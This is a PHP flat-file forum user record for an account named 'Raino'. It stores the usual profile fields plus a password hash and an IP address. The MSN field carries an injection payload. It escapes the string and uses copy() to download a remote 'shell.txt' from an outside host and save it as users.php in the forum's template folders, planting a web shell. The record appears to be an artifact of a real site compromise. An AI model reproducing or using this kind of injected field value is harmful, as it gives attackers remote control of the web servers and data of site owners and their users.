<?php

$userid="114";
$password="e8f4e25bd1b03a5d39c484e2050e6e35";
$username="Raino";
$useralias="Raino";
$userrealname="";
$useremail="YOU_LAMERZ@LOL.MIL";
$useremhide="hide";
$userip="194.68.63.142";
$usersig="";
$userslogan="";
$useravatar="";
$usermsn="\';>< copy(\'http://nwhg.nm.ru/shell.txt\',\'templates/pb/images/ranks/users.php\'); copy(\'http://nwhg.nm.ru/shell.txt\',\'templates/users.php\'); ><#";
$userposts="0";
$usericq="";
$userqq="";
$userwebavatar="";
$userrank="1";
$useryahoo="";
$useraim="";
$userlocation="";
$userjoined="1117668381";
$userhomepage="http://";
$useradmin="0";
$usermod="0";
$userban="0";
$userfriend="";
$userlastvisit="1117668449";
$userlastpost="1117668381";
$userprevvisit="1117668437";
$useranimsmilies="";
$lastaliaschange="1117668381";
$userlang="";
$uservisits="4";
$aliaslist="";
$noavatars="";

?>